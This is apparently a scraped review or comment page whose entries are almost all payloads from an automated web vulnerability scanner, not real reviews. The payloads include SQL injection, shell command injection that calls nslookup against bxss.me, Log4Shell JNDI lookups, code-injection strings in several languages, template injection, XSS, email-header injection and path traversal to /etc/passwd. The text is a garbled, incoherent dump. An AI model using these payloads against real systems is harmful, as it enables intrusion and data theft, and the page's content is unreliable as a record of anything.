1
Mr.

KoeJVp69

MBWUpmEH

22 March 2022

1
Mr.

^(#$!@#$)(()))******

MBWUpmEH

22 March 2022

1
;(nslookup hituucdyjasmg6eca8.bxss.me||perl -e "gethostbyname('hituucdyjasmg6eca8.bxss.me')")|(nslookup hituucdyjasmg6eca8.bxss.me||perl -e "gethostbyname('hituucdyjasmg6eca8.bxss.me')")&(nslookup hituucdyjasmg6eca8.bxss.me||perl -e "gethostbyname('hituucdyjasmg6eca8.bxss.me')")

555

MBWUpmEH

22 March 2022

1
1some_inexistent_file_with_long_name.

555

MBWUpmEH

22 March 2022

1
Mr.

-1 OR 2+631-631-1=0+0+0+1 --

MBWUpmEH

22 March 2022

1
)

555

MBWUpmEH

22 March 2022

1
Mr.

-1 OR 2+920-920-1=0+0+0+1

MBWUpmEH

22 March 2022

1
Http://bxss.me/t/fit.txt

555

MBWUpmEH

22 March 2022

1
!(()&&!|*|*|

555

MBWUpmEH

22 March 2022

1
http://bxss.me/t/fit.txt?.

555

MBWUpmEH

22 March 2022

1
Mr.

-1' OR 2+922-922-1=0+0+0+1 --

MBWUpmEH

22 March 2022

1
^(#$!@#$)(()))******

555

MBWUpmEH

22 March 2022

1
Mr.

-1' OR 2+948-948-1=0+0+0+1 or 'oUyBf1kt'='

MBWUpmEH

22 March 2022

1
bxss.me

555

MBWUpmEH

22 March 2022

1
Mr.

'.gethostbyname(lc('hitzp'.'vshfxais39cb9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(83).chr(115).chr(87).'

MBWUpmEH

22 March 2022

1
Mr.

-1" OR 2+106-106-1=0+0+0+1 --

MBWUpmEH

22 March 2022

1
Mr.

if(now()=sysdate(),sleep(15),0)

MBWUpmEH

22 March 2022

1
Mr.

".gethostbyname(lc("hitdf"."eybpkbzkc383c.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(66).chr(109).chr(66)."

MBWUpmEH

22 March 2022

1
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

MBWUpmEH

22 March 2022

1
'.gethostbyname(lc('hitew'.'fxhpssjv55ccd.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(74).chr(116).chr(71).'

555

MBWUpmEH

22 March 2022

1
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

MBWUpmEH

22 March 2022

1
".gethostbyname(lc("hitex"."fsejrkfi51a1a.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(83).chr(107).chr(69)."

555

MBWUpmEH

22 March 2022

1
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

MBWUpmEH

22 March 2022

1
Mr.

HttP://bxss.me/t/xss.html?%00

MBWUpmEH

22 March 2022

1
Mr.

bxss.me/t/xss.html?%00

MBWUpmEH

22 March 2022

1
Mr.

-1; waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

1
HttP://bxss.me/t/xss.html?%00

555

MBWUpmEH

22 March 2022

1
Mr.

-1); waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

1
Mr.

str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitzfelxysgvn8d5a2.'+'bxss.me')

MBWUpmEH

22 March 2022

1
Mr.

-1)); waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

1
bxss.me/t/xss.html?%00

555

MBWUpmEH

22 March 2022

1
Mr.

'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitzfelxysgvn8d5a2."+"bxss.me")+'

MBWUpmEH

22 March 2022

1
Mr.

1 waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

1
Mr.

"+"A".concat(70-3).concat(22*4).concat(120).concat(90).concat(97).concat(69)+(require"socket" Socket.gethostbyname("hitsx"+"fmjjyqwp5f43e.bxss.me.")[3].to_s)+"

MBWUpmEH

22 March 2022

1
Mr.

"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitzfelxysgvn8d5a2.'+'bxss.me')+"

MBWUpmEH

22 March 2022

1
Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

MBWUpmEH

22 March 2022

1
Mr.

USTS75B2'; waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

1
str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitnuicuxylwb9c21c.'+'bxss.me')

555

MBWUpmEH

22 March 2022

1
Mr.

'+'A'.concat(70-3).concat(22*4).concat(102).concat(82).concat(100).concat(76)+(require'socket' Socket.gethostbyname('hitvk'+'roescifl9dd2d.bxss.me.')[3].to_s)+'

MBWUpmEH

22 March 2022

1
Mr.

';print(md5(31337));$a='

MBWUpmEH

22 March 2022

1
Mr.

euElAO2t'); waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

1
"+"A".concat(70-3).concat(22*4).concat(110).concat(67).concat(100).concat(84)+(require"socket" Socket.gethostbyname("hitlb"+"ssjqqtto00ace.bxss.me.")[3].to_s)+"

555

MBWUpmEH

22 March 2022

1
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitnuicuxylwb9c21c."+"bxss.me")+'

555

MBWUpmEH

22 March 2022

1
Mr.

FrRKzKyX')); waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

1
Mr.

";print(md5(31337));$a="

MBWUpmEH

22 March 2022

1
'+'A'.concat(70-3).concat(22*4).concat(98).concat(75).concat(116).concat(82)+(require'socket' Socket.gethostbyname('hithx'+'pzqbczyi19fb0.bxss.me.')[3].to_s)+'

555

MBWUpmEH

22 March 2022

1
"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitnuicuxylwb9c21c.'+'bxss.me')+"

555

MBWUpmEH

22 March 2022

1
Mr.

-5 OR 294=(SELECT 294 FROM PG_SLEEP(15))--

MBWUpmEH

22 March 2022

1
Mr.

${@print(md5(31337))}

MBWUpmEH

22 March 2022

1
Mr.

-5) OR 469=(SELECT 469 FROM PG_SLEEP(15))--

MBWUpmEH

22 March 2022

1
Mr.

${@print(md5(31337))}\

MBWUpmEH

22 March 2022

1
Mr.

-1)) OR 535=(SELECT 535 FROM PG_SLEEP(15))--

MBWUpmEH

22 March 2022

1
Mr.

'.print(md5(31337)).'

MBWUpmEH

22 March 2022

1
Mr.

addreview

MBWUpmEH

22 March 2022

1
Mr.

9LnEPx6e' OR 38=(SELECT 38 FROM PG_SLEEP(15))--

MBWUpmEH

22 March 2022

1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

555

MBWUpmEH

22 March 2022

1
Mr.

addreview

MBWUpmEH

22 March 2022

1
Mr.

http://hitambqiufysa.bxss.me/

MBWUpmEH

22 March 2022

1
Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

MBWUpmEH

22 March 2022

1
Mr.

bKBgOtwk') OR 90=(SELECT 90 FROM PG_SLEEP(15))--

MBWUpmEH

22 March 2022

1
Mr.

addreview/.

MBWUpmEH

22 March 2022

1
';print(md5(31337));$a='

555

MBWUpmEH

22 March 2022

1
http://hitkxgxahjint.bxss.me/

555

MBWUpmEH

22 March 2022

1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

555

MBWUpmEH

22 March 2022

1
";print(md5(31337));$a="

555

MBWUpmEH

22 March 2022

1
addreview

555

MBWUpmEH

22 March 2022

1
Mr.

U0E4FWaf')) OR 583=(SELECT 583 FROM PG_SLEEP(15))--

MBWUpmEH

22 March 2022

1
addreview

555

MBWUpmEH

22 March 2022

1
${@print(md5(31337))}

555

MBWUpmEH

22 March 2022

1
Mr.

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

MBWUpmEH

22 March 2022

1
Mr.

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

MBWUpmEH

22 March 2022

1
addreview/.

555

MBWUpmEH

22 March 2022

1
${@print(md5(31337))}\

555

MBWUpmEH

22 March 2022

1
Mr.

/xfs.bxss.me

MBWUpmEH

22 March 2022

1
'.print(md5(31337)).'

555

MBWUpmEH

22 March 2022

1
Mr.

1'"

MBWUpmEH

22 March 2022

1
/xfs.bxss.me

555

MBWUpmEH

22 March 2022

1
Mr.

1����%2527%2522

MBWUpmEH

22 March 2022

1
Mr.

'"

MBWUpmEH

22 March 2022

1
Mr.

@@jIHsJ

MBWUpmEH

22 March 2022

1
Mr.

555

MBWUpmEH

22 March 2022

1
'"

555

MBWUpmEH

22 March 2022

1
Mr.

555

MBWUpmEH

22 March 2022

19440541
Mr.

555

MBWUpmEH

22 March 2022

1
1wPgRZoZ

555

MBWUpmEH

22 March 2022

1
-1 OR 2+908-908-1=0+0+0+1 --

555

MBWUpmEH

22 March 2022

1
-1 OR 2+792-792-1=0+0+0+1

555

MBWUpmEH

22 March 2022

1
-1' OR 2+344-344-1=0+0+0+1 --

555

MBWUpmEH

22 March 2022

1
-1' OR 2+676-676-1=0+0+0+1 or 'CMYe6bqp'='

555

MBWUpmEH

22 March 2022

1
-1" OR 2+784-784-1=0+0+0+1 --

555

MBWUpmEH

22 March 2022

1
Mr.

555

MBWUpmEH

22 March 2022

1
if(now()=sysdate(),sleep(15),0)

555

MBWUpmEH

22 March 2022

1
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

555

MBWUpmEH

22 March 2022

1
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

555

MBWUpmEH

22 March 2022

1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555

MBWUpmEH

22 March 2022

1
1 waitfor delay '0:0:15' --

555

MBWUpmEH

22 March 2022

1
HsGOaqE9'; waitfor delay '0:0:15' --

555

MBWUpmEH

22 March 2022

1
tkIjqtg1'); waitfor delay '0:0:15' --

555

MBWUpmEH

22 March 2022

1
dfwCNAN2')); waitfor delay '0:0:15' --

555

MBWUpmEH

22 March 2022

1
vWs11hWE' OR 486=(SELECT 486 FROM PG_SLEEP(15))--

555

MBWUpmEH

22 March 2022

1
vQl3NRG2') OR 24=(SELECT 24 FROM PG_SLEEP(15))--

555

MBWUpmEH

22 March 2022

1
y4K9AiZS')) OR 324=(SELECT 324 FROM PG_SLEEP(15))--

555

MBWUpmEH

22 March 2022

1
Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

555

MBWUpmEH

22 March 2022

1
1'"

555

MBWUpmEH

22 March 2022

1
1����%2527%2522

555

MBWUpmEH

22 March 2022

1
@@9G6hB

555

MBWUpmEH

22 March 2022

1
Mr.

5559952082

MBWUpmEH

22 March 2022

1
Mr.

acu10759<s1﹥s2ʺs3ʹuca10759

MBWUpmEH

22 March 2022

1
Mr.

acux8403��z1��z2a�bcxuca8403

MBWUpmEH

22 March 2022

1
Mr.

<%={{={@{#{${acx}}%>

MBWUpmEH

22 March 2022

1
Mr.

555

MBWUpmEH

22 March 2022

1
Mr.

acx{{98991*97996}}xca

MBWUpmEH

22 March 2022

1
Mr.

acx{{98991*97996}}xca

MBWUpmEH

22 March 2022

1
Mr.

acx{98991*97996}xca

MBWUpmEH

22 March 2022

1
Mr.

acx${98991*97996}xca

MBWUpmEH

22 March 2022

1
Mr.

acx#{98991*97996}xca

MBWUpmEH

22 March 2022

1
Mr.

acx{#98991*97996}xca

MBWUpmEH

22 March 2022

1
Mr.

acx{@98991*97996}xca

MBWUpmEH

22 March 2022

1
Mr.

acx{{=98991*97996}}xca

MBWUpmEH

22 March 2022

1
Mr.

acx@(98991*97996)xca

MBWUpmEH

22 March 2022

1
Mr.

acx<%=98991*97996%>xca

MBWUpmEH

22 March 2022

1
Mr.

acx#set($x=98991*97996)${x}xca

MBWUpmEH

22 March 2022

1
Mr.

acx{{"abc"|title}}xca

MBWUpmEH

22 March 2022

1
Mr.

print("acx" . 98991*97996 . "xca");

MBWUpmEH

22 March 2022

1
Mr.

98991*97996*98991*97996

MBWUpmEH

22 March 2022

1
Mr.

acx{@math key=98991 method="multiply" operand=97996/}xca

MBWUpmEH

22 March 2022

1
Mr.

acx{{{this}}}xca

MBWUpmEH

22 March 2022

1
Mr.

#{98991*97996*98991*97996}

MBWUpmEH

22 March 2022

1
Mr.

acx#{xca}=123

MBWUpmEH

22 March 2022

1
Mr.

acx{{'abcd'.toUpperCase()}}xca

MBWUpmEH

22 March 2022

1
Mr.

AAABBBCCC{{define "bla"}}bla{{end}}{{define "acx"}}xyz{{end}}{{template "acx"}}CCCBBBAAA

MBWUpmEH

22 March 2022

1
Mr.

acx{{98991*97996}}xca

MBWUpmEH

22 March 2022

1
Mr.

acx[[${98991*97996}]]xca

MBWUpmEH

22 March 2022

1
Mr.

acx__${98991*97996}__::.x

MBWUpmEH

22 March 2022

1
Mr.

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

MBWUpmEH

22 March 2022

1
Mr.

%35%35%35%3C%53%63%52%69%50%74%20%3E%4F%33%54%4F%289082%29%3C%2F%73%43%72%69%70%54%3E

MBWUpmEH

22 March 2022

1
Mr.

555\u003CScRiPt\O3TO(9243)\u003C/sCripT\u003E

MBWUpmEH

22 March 2022

1
Mr.

555&lt;ScRiPt&gt;O3TO(9364)&lt;/sCripT&gt;

MBWUpmEH

22 March 2022

5
Mr.

1

MBWUpmEH

22 March 2022

5
Mr.

1

MBWUpmEH

22 March 2022

1
Mr.

555}body{acu:Expre/**/SSion(O3TO(9161))}

MBWUpmEH

22 March 2022

1
Mr.9320078

555

MBWUpmEH

22 March 2022

5
${j${::-n}di:dns${::-:}${::-/}/hitllyuorthyk9539e${::-.}bxss.me}zzzz

1

MBWUpmEH

22 March 2022

5
�💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hiteuamcrqyig3bd7c${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

1

MBWUpmEH

22 March 2022

5
response.write(9505973*9608299)

1

MBWUpmEH

22 March 2022

5
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.009247.80-2896.80.61d4e${::-.}1${::-.}bxss.me}}

1

MBWUpmEH

22 March 2022

5
'+response.write(9505973*9608299)+'

1

MBWUpmEH

22 March 2022

1
acu1685<s1﹥s2ʺs3ʹuca1685

555

MBWUpmEH

22 March 2022

5
Mr.

${j${::-n}di:dns${::-:}${::-/}/hitjlhtzcnfei061ac${::-.}bxss.me}zzzz

MBWUpmEH

22 March 2022

5
"+response.write(9505973*9608299)+"

1

MBWUpmEH

22 March 2022

1
acux7450��z1��z2a�bcxuca7450

555

MBWUpmEH

22 March 2022

5
Mr.

�💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitexcjwhghnua3de7${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

MBWUpmEH

22 March 2022

5
Mr.

response.write(9595952*9708845)

MBWUpmEH

22 March 2022

5
/../../../../../../../../../../windows/system32/BITSADMIN.exe

1

MBWUpmEH

22 March 2022

5
Mr.

${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.009247.80-2898.80.61d4e${::-.}1${::-.}bxss.me}}

MBWUpmEH

22 March 2022

5
Mr.

'+response.write(9595952*9708845)+'

MBWUpmEH

22 March 2022

1
<%={{={@{#{${acx}}%>

555

MBWUpmEH

22 March 2022

5
Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

MBWUpmEH

22 March 2022

5
Mr.

"+response.write(9595952*9708845)+"

MBWUpmEH

22 March 2022

1
Mr.

555

MBWUpmEH

22 March 2022

5
Mr.

1

MBWUpmEH

22 March 2022

5
vCZXm3c8

1

MBWUpmEH

22 March 2022

1
acx{{98991*97996}}xca

555

MBWUpmEH

22 March 2022

5
Mr.

rt6MUOWq

MBWUpmEH

22 March 2022

1
acx{{98991*97996}}xca

555

MBWUpmEH

22 March 2022

5
Mr.

1

MBWUpmEH

22 March 2022

5
Mr.%0abcc:009247.80-2903.80.61d4e.19073.2@bxss.me

1

MBWUpmEH

22 March 2022

1
acx{98991*97996}xca

555

MBWUpmEH

22 March 2022

5
Mr.

1

MBWUpmEH

22 March 2022

5
to@example.com>%0d%0abcc:009247.80-2904.80.61d4e.19073.2@bxss.me

1

MBWUpmEH

22 March 2022

5

1

MBWUpmEH

22 March 2022

5
Mr.

1

MBWUpmEH

22 March 2022

1
acx${98991*97996}xca

555

MBWUpmEH

22 March 2022

5
Mr.

1%0abcc:009247.80-2905.80.61d4e.19073.2@bxss.me

MBWUpmEH

22 March 2022

5
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

1

MBWUpmEH

22 March 2022

5
Mr.

to@example.com>%0d%0abcc:009247.80-2906.80.61d4e.19073.2@bxss.me

MBWUpmEH

22 March 2022

1
acx#{98991*97996}xca

555

MBWUpmEH

22 March 2022

5
Mr.

MBWUpmEH

22 March 2022

5
../../../../../../../../../../../../../../etc/passwd

1

MBWUpmEH

22 March 2022

5
Mr.

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

MBWUpmEH

22 March 2022

5
${9999065+9999245}

1

MBWUpmEH

22 March 2022

1
acx{#98991*97996}xca

555

MBWUpmEH

22 March 2022

5
../../../../../../../../../../../../../../windows/win.ini

1

MBWUpmEH

22 March 2022

5
Mr.

${9999879+10000016}

MBWUpmEH

22 March 2022

1
acx{@98991*97996}xca

555

MBWUpmEH

22 March 2022

5
Mr.

1

MBWUpmEH

22 March 2022

5
../Mr.

1

MBWUpmEH

22 March 2022

1
acx{{=98991*97996}}xca

555

MBWUpmEH

22 March 2022

5
Mr.&n930855=v926146

1

MBWUpmEH

22 March 2022

5
Mr.

../../../../../../../../../../../../../../etc/passwd

MBWUpmEH

22 March 2022

1
acx@(98991*97996)xca

555

MBWUpmEH

22 March 2022

5
Mr.

../../../../../../../../../../../../../../windows/win.ini

MBWUpmEH

22 March 2022

5
Mr.

1&n981881=v905907

MBWUpmEH

22 March 2022

5
Mr.

1

MBWUpmEH

22 March 2022

1
acx<%=98991*97996%>xca

555

MBWUpmEH

22 March 2022

5
Mr.

../1

MBWUpmEH

22 March 2022

1
acx#set($x=98991*97996)${x}xca

555

MBWUpmEH

22 March 2022

5
)

1

MBWUpmEH

22 March 2022

1
acx{{"abc"|title}}xca

555

MBWUpmEH

22 March 2022

5
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.

1

MBWUpmEH

22 March 2022

5
!(()&&!|*|*|

1

MBWUpmEH

22 March 2022

5
^(#$!@#$)(()))******

1

MBWUpmEH

22 March 2022

5
1some_inexistent_file_with_long_name%00.

1

MBWUpmEH

22 March 2022

1
print("acx" . 98991*97996 . "xca");

555

MBWUpmEH

22 March 2022

5
Mr.

)

MBWUpmEH

22 March 2022

5
Http://bxss.me/t/fit.txt

1

MBWUpmEH

22 March 2022

5
'.gethostbyname(lc('hitxl'.'gxjfxnsc57a39.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(81).chr(109).chr(65).'

1

MBWUpmEH

22 March 2022

1
98991*97996*98991*97996

555

MBWUpmEH

22 March 2022

5
Mr.

!(()&&!|*|*|

MBWUpmEH

22 March 2022

5
http://bxss.me/t/fit.txt%3F.

1

MBWUpmEH

22 March 2022

5
".gethostbyname(lc("hitlq"."rlgiihar402d0.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(76).chr(99).chr(66)."

1

MBWUpmEH

22 March 2022

5
Mr.

^(#$!@#$)(()))******

MBWUpmEH

22 March 2022

5
bxss.me

1

MBWUpmEH

22 March 2022

5
Mr.

'.gethostbyname(lc('hitnj'.'jhmbtynf583f7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(79).chr(108).chr(85).'

MBWUpmEH

22 March 2022

1
acx{@math key=98991 method="multiply" operand=97996/}xca

555

MBWUpmEH

22 March 2022

5
Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

MBWUpmEH

22 March 2022

5
Mr.

".gethostbyname(lc("hitjv"."pdkgmexa4ba47.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(82).chr(113).chr(74)."

MBWUpmEH

22 March 2022

1
acx{{{this}}}xca

555

MBWUpmEH

22 March 2022

5
Mr.

1some_inexistent_file_with_long_name%00.jpg

MBWUpmEH

22 March 2022

5
Mr.

Http://bxss.me/t/fit.txt

MBWUpmEH

22 March 2022

1
#{98991*97996*98991*97996}

555

MBWUpmEH

22 March 2022

5
Mr.

http://bxss.me/t/fit.txt%3F.jpg

MBWUpmEH

22 March 2022

5
Mr.

bxss.me

MBWUpmEH

22 March 2022

1
acx#{xca}=123

555

MBWUpmEH

22 March 2022

5
str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitiaqxxaxlil322c7.'+'bxss.me')

1

MBWUpmEH

22 March 2022

5
HttP://bxss.me/t/xss.html?%00

1

MBWUpmEH

22 March 2022

5
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitiaqxxaxlil322c7."+"bxss.me")+'

1

MBWUpmEH

22 March 2022

1
acx{{'abcd'.toUpperCase()}}xca

555

MBWUpmEH

22 March 2022

5
bxss.me/t/xss.html?%00

1

MBWUpmEH

22 March 2022

5
"+"A".concat(70-3).concat(22*4).concat(101).concat(68).concat(97).concat(87)+(require"socket" Socket.gethostbyname("hithu"+"lkwmgdwz69da7.bxss.me.")[3].to_s)+"

1

MBWUpmEH

22 March 2022

5
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1

MBWUpmEH

22 March 2022

5
"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitiaqxxaxlil322c7.'+'bxss.me')+"

1

MBWUpmEH

22 March 2022

5
'+'A'.concat(70-3).concat(22*4).concat(121).concat(90).concat(119).concat(88)+(require'socket' Socket.gethostbyname('hitep'+'chzemowbf9f78.bxss.me.')[3].to_s)+'

1

MBWUpmEH

22 March 2022

5
Mr.

HttP://bxss.me/t/xss.html?%00

MBWUpmEH

22 March 2022

5
Mr.

str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitzwhzrqlqfse2a66.'+'bxss.me')

MBWUpmEH

22 March 2022

5
';print(md5(31337));$a='

1

MBWUpmEH

22 March 2022

1
AAABBBCCC{{define "bla"}}bla{{end}}{{define "acx"}}xyz{{end}}{{template "acx"}}CCCBBBAAA

555

MBWUpmEH

22 March 2022

5
";print(md5(31337));$a="

1

MBWUpmEH

22 March 2022

5
Mr.

bxss.me/t/xss.html?%00

MBWUpmEH

22 March 2022

5
Mr.

"+"A".concat(70-3).concat(22*4).concat(97).concat(89).concat(115).concat(72)+(require"socket" Socket.gethostbyname("hitnm"+"gmaerilaf709e.bxss.me.")[3].to_s)+"

MBWUpmEH

22 March 2022

5
Mr.

'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitzwhzrqlqfse2a66."+"bxss.me")+'

MBWUpmEH

22 March 2022

5
Mr.

1

MBWUpmEH

22 March 2022

1
acx{{98991*97996}}xca

555

MBWUpmEH

22 March 2022

5
http://hitgvhklcwquj.bxss.me/

1

MBWUpmEH

22 March 2022

5
Mr.

'+'A'.concat(70-3).concat(22*4).concat(102).concat(72).concat(100).concat(75)+(require'socket' Socket.gethostbyname('hitfz'+'aafsnsar615fd.bxss.me.')[3].to_s)+'

MBWUpmEH

22 March 2022

5
Mr.

"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitzwhzrqlqfse2a66.'+'bxss.me')+"

MBWUpmEH

22 March 2022

5
${@print(md5(31337))}

1

MBWUpmEH

22 March 2022

5
Mr.

1

MBWUpmEH

22 March 2022

5
echo myfwyu$()\ qupkrg\nz^xyu||a #' &echo myfwyu$()\ qupkrg\nz^xyu||a #|" &echo myfwyu$()\ qupkrg\nz^xyu||a #

1

MBWUpmEH

22 March 2022

5
${@print(md5(31337))}\

1

MBWUpmEH

22 March 2022

5
NTvM5FVP

1

MBWUpmEH

22 March 2022

5
Mr.

http://hitmqpxdaivhn.bxss.me/

MBWUpmEH

22 March 2022

1
acx[[${98991*97996}]]xca

555

MBWUpmEH

22 March 2022

5
-1 OR 2+572-572-1=0+0+0+1 --

1

MBWUpmEH

22 March 2022

5
'.print(md5(31337)).'

1

MBWUpmEH

22 March 2022

5
&echo dlmyjb$()\ niqwhl\nz^xyu||a #' &echo dlmyjb$()\ niqwhl\nz^xyu||a #|" &echo dlmyjb$()\ niqwhl\nz^xyu||a #

1

MBWUpmEH

22 March 2022

5
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

MBWUpmEH

22 March 2022

5
Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

MBWUpmEH

22 March 2022

5
/xfs.bxss.me

1

MBWUpmEH

22 March 2022

1
acx__${98991*97996}__::.x

555

MBWUpmEH

22 March 2022

5
-1 OR 2+489-489-1=0+0+0+1

1

MBWUpmEH

22 March 2022

5
Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

MBWUpmEH

22 March 2022

5
|echo zuvzvp$()\ iulcmm\nz^xyu||a #' |echo zuvzvp$()\ iulcmm\nz^xyu||a #|" |echo zuvzvp$()\ iulcmm\nz^xyu||a #

1

MBWUpmEH

22 March 2022

5
Mr.

';print(md5(31337));$a='

MBWUpmEH

22 March 2022

5
Mr.

/xfs.bxss.me

MBWUpmEH

22 March 2022

5
-1' OR 2+368-368-1=0+0+0+1 --

1

MBWUpmEH

22 March 2022

4

MBWUpmEH

22 March 2022

5
-1' OR 2+197-197-1=0+0+0+1 or 'FPerSnjp'='

1

MBWUpmEH

22 March 2022

5
Mr.

";print(md5(31337));$a="

MBWUpmEH

22 March 2022

1
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

MBWUpmEH

22 March 2022

5
'"

1

MBWUpmEH

22 March 2022

5
-1" OR 2+319-319-1=0+0+0+1 --

1

MBWUpmEH

22 March 2022

4

MBWUpmEH

22 March 2022

5
Mr.

${@print(md5(31337))}

MBWUpmEH

22 March 2022

5
(nslookup hitxnbwmrgkfl55933.bxss.me||perl -e "gethostbyname('hitxnbwmrgkfl55933.bxss.me')")

1

MBWUpmEH

22 March 2022

4
1FBVeTRCO

MBWUpmEH

22 March 2022

5
if(now()=sysdate(),sleep(15),0)

1

MBWUpmEH

22 March 2022

5
Mr.

${@print(md5(31337))}\

MBWUpmEH

22 March 2022

5
Mr.

'"

MBWUpmEH

22 March 2022

59188929
Mr.

1

MBWUpmEH

22 March 2022

5
Mr.

'.print(md5(31337)).'

MBWUpmEH

22 March 2022

4

1Mlzk2HrO

MBWUpmEH

22 March 2022

5
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1

MBWUpmEH

22 March 2022

5
$(nslookup hitxpkwrtnvml2d223.bxss.me||perl -e "gethostbyname('hitxpkwrtnvml2d223.bxss.me')")

1

MBWUpmEH

22 March 2022

5
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1

MBWUpmEH

22 March 2022

5
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1

MBWUpmEH

22 March 2022

5
&(nslookup hitvqgattueliec9b4.bxss.me||perl -e "gethostbyname('hitvqgattueliec9b4.bxss.me')")&'\"`0&(nslookup hitvqgattueliec9b4.bxss.me||perl -e "gethostbyname('hitvqgattueliec9b4.bxss.me')")&`'

1

MBWUpmEH

22 March 2022

5
1 waitfor delay '0:0:15' --

1

MBWUpmEH

22 March 2022

5
QkLN4Ae9'; waitfor delay '0:0:15' --

1

MBWUpmEH

22 March 2022

5
|(nslookup hitokrrturoir7fb2a.bxss.me||perl -e "gethostbyname('hitokrrturoir7fb2a.bxss.me')")

1

MBWUpmEH

22 March 2022

5
7vfMLGWC'); waitfor delay '0:0:15' --

1

MBWUpmEH

22 March 2022

5
Mr.

1

MBWUpmEH

22 March 2022

5
zetECEDO')); waitfor delay '0:0:15' --

1

MBWUpmEH

22 March 2022

4
response.write(9950732*9982032)

MBWUpmEH

22 March 2022

5
QgosqnW7' OR 606=(SELECT 606 FROM PG_SLEEP(15))--

1

MBWUpmEH

22 March 2022

4
${j${::-n}di:dns${::-:}${::-/}/hittsxgmfezuib3acb${::-.}bxss.me}zzzz

MBWUpmEH

22 March 2022

5
`(nslookup hitixrdckcrqnb6c82.bxss.me||perl -e "gethostbyname('hitixrdckcrqnb6c82.bxss.me')")`

1

MBWUpmEH

22 March 2022

4
'+response.write(9950732*9982032)+'

MBWUpmEH

22 March 2022

4
"+response.write(9950732*9982032)+"

MBWUpmEH

22 March 2022

5
;(nslookup hitmnckrrfoosabf8d.bxss.me||perl -e "gethostbyname('hitmnckrrfoosabf8d.bxss.me')")|(nslookup hitmnckrrfoosabf8d.bxss.me||perl -e "gethostbyname('hitmnckrrfoosabf8d.bxss.me')")&(nslookup hitmnckrrfoosabf8d.bxss.me||perl -e "gethostbyname('hitmnckrrfoosabf8d.bxss.me')")

1

MBWUpmEH

22 March 2022

4
